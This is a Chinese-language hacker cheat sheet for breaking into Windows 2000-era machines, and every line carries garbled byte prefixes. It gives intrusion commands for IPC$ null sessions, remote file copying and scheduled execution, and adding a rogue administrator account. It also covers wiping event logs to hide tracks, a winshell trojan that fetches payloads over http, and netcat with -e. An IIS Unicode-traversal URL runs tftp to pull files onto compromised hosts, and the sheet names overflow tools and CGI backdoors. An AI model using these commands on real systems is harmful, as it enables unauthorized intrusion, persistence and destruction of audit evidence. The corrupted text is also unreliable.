网管和黑客都必须知道的命令
�Cd|V<BB9� 常用的几条NET命令:
1mI�)xD�i9 <Er�|s^C�� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
-BQ��M� i0 ��(zJ
TBI' (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
!R{L���`T0 ']Y:f)��i# (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
�T`a [~�:� /�MQd�[03] (查看远程主机时间) net time \\IP地址
2$[�u&_�_E �{hg,F?p
' (定时启动某个程序) at \\IP地址 02:18 readme.exe
Cm�J*oX�yi CzNSJVE�5 (查看共享) net view \\IP地址
�PcUi+[s;x Fo?��2nQ< (查看netbios工作组列表) nbtstat -A IP地址
[uA��f�E�3 a�}�jax�Gy (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
tJHz�h�H)� KkAk(�9Q/3 (这两条把自己增加到管理员组): net user 用户名 密码 /add
l�<7 ��b�� X��5>p~;[9 net localgroup Administrators 用户名 /add
�20%�xD �e �&~$^�a1D6 (断开连接) net use \\IP地址\ipc$ /delete
��er l_�Gg :Q?�xNY%�� 扫尾:
�& r\z9! � Q�o;$iL�t� del C:\winnt\system32\logfiles\*.*
jew?cnRmd� ��&h4(l�M� del C:\winnt\ssytem32\config\*.evt
@zd)]O]xH? ;z�Sh�9�H del C:\winnt\system32\dtclog\*.*
��l�pSM �p �)2bP�u�[U del C:\winnt\system32\*.log
'7xmj:�.== �s`H}NjW�x del C:\winnt\system32\*.txt
d�x���Mz! ~73YOGiGJH del C:\winnt\*.txt
'^7S�a���� �I��"T_<� del C:\winnt\*.log
Vs{�|:L+ 5Z`f)�qE�
一、netsvc.exe
5G�\vV]RR& G9Xr�wk<g4 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
YdE$G>�&em �d['�BtV�J netsvc /list \\IP地址
i/)�Uj-*G) /7P4�[~�vw netsvc schedule \\IP地址 /query
eW�7;�yH�� l�D
!^Mq�K netsvc \\IP地址 schedule /start
~�5�cLI;4h ��=C<_rB�Y 二、OpenTelnet.exe
�(F$q|qZ%� �{��:{N�K% 远程启动主机的Telnet服务,并绑定端口到7878,例如:
AO8`ItNZdT #��MOEY�|6 OpenTelnet \\IP地址 用户名 密码 1 7878
�#1�V� vK
,�Y9lp�)w� 然后就可以telnet到主机的7878端口,进入DOS方式下:
�7U?x8%H*� Nz5gu.a6{L telnet IP地址 7878
a�QinR�"o g� w�}t.3} 三、winshell.exe
Zf?�>:��P� �o1�I{^7�/ 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�"MK:y[+*� LRB�#|PW� p Path (查看winshell主程序的路径信息)
(kb^=kw#0� `;�QpPSw�+ b reBoot (重新启动机器)
|�3"�'>*
J B�hd�J/C�^ d shutDown (关闭机器)
FeSe^�^d�W M@s2T|bQ�w s Shell (执行后你就会看到可爱的“C:\>”)
���L
F Z� g<}K^)�x�� x eXit (退出本次登录会话,此命令并不终止winshell的运行)
uWi+F)GS^K �:[\�}Hn=� CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
7�CM<"p�V� Q> @0'y=s� 四、3389登陆器,GUI方式登录远程主机的
��ivw2EEo, W�BTX�~%*U 五、elsave.exe
`�sJkOEc` �R:i7Rb2C 事件日志清除工具
)�ZNH/�9e/ '>2xP<ct!& elsave -s \\IP地址 -l "application" -C
m�j��S)*@F oh�#6>���| elsave -s \\IP地址 -l "system" -C
gZ/M��0�px `4�w0�*;k; elsave -s \\IP地址 -l "security" -C
#/�5jW�H7U 3Yg��/-=U( 执行后成功清除应用程序日志,系统日志,安全日志
^a��Xyho� �F!'b_�gmz 六、hbulot.exe
�p~�+�)!Z# p0�'�A\�@| 开启win2kserver和winxp的3389服务
p�S*��vwYA H��Pr5mWs: hbulot [/r]
�$S=lm �{ [T~O%ly7x& 使用/r表示安装完成后自动重起目标使设置生效。
2x3�&o�|�J <\2,7K{{+; 七、nc.exe(netcat.exe)
�j"J2��&Y2 M<g>z6 ��� 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
�0gfa�7+�Y �>9Ub=tZm� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
.T4"+FT�zP X�m\tyL��Y 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
7(Y�!w8q&^ %�2��bZeZ 参数:
J/�R=O���> ?s����p�� -e prog 程序重定向,一旦连接,就执行 [危险!!]
S-'iOJ�1]� h"]v+u`!SM -g gateway source-routing hop point[s], up to 8
3D;\�V&([ ~�A [ Ju%R -G num source-routing pointer: 4, 8, 12, ...
}UQBaqD�H [S-NGi�p�� -h 帮助信息
m3�P%E8<Q# $&k�� zix� -i secs 延时的间隔
T4o}5sq�}S eP[azC"G�[ -l 监听模式,用于入站连接
rK�}*Uw�ut �:6N{~�[:4 -n 指定数字的IP地址,不能用hostname
�H:y��.�7 ?<xGO�@b
. -o file 记录16进制的传输
O<."C=�1~E QZt/�Rm>W0 -p port 本地端口号
2/q�f�K+a (��lS&P"Xi -r 任意指定本地及远程端口
)k �<ON~x� Qig���hvei -s addr 本地源地址
m0X�K?;\�V �B.I�c�8�' -u UDP模式
V�X2bC(E'% v�r=�iG
xD -v 详细输出——用两个-v可得到更详细的内容
C�03eh�jT< @j5�W4�HU� -w secs timeout的时间
55�2c4h/�T +Rxf~m(pV� -z 将输入输出关掉——用于扫描时
x_bS-B)%Y: 八、TFTPD32.EXE
5JIa?i�>B� pbR84g^p.S 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
K=+w,H#�`C GkaIqBS��� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
2O`u�zT��$ �@�M�:j~�� 然后可以直接令文件运行:
{$oZR"�MP� zrD$loaW.' http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
.+|G`*1<i� &6r"�.\;�^ 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
H�_vOZ0��� mS�&[��<[x 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
}qi6�K-,oU o^d(mJZ.F~ 一、一 Xscan命令行运行参数说明:
Y'�%�sA~�g AX<TkS@wjb 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
}!lLA4X�Rr �[$OD+@~A2 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
2�,E&}a|;b Pm%Zz����U xscan -file <主机列表文件名> <检测项目> [其他选项]
h,rGa\�X~0 kI�P~X�V~ 其中<检测项目> 含义如下:
�b ]�1Su�L kH�m1�aE�< -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
dkLc"$(�O� *N�[.']#n -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
O&E1(M|*>� F�FK7�9e/5 -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
9�k&��lq$ �#O\4XZ,Lv -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
Uk�6Y6mU V 91�jv=>=DM -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
P�/,7CfyPd �;Be�jFcb� [其他选项] 含义如下:
VK�S:d!}3E �`-�qSvj�X -v: 显示详细扫描进度
8!�4=j���� �&�CCB;Oi% -p: 跳过Ping不通的主机
CNM/}|N^Si T{{J'
_s5L -o: 跳过没有检测到开放端口的主机
}i|o�":-x+ H.v`JNs��( -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
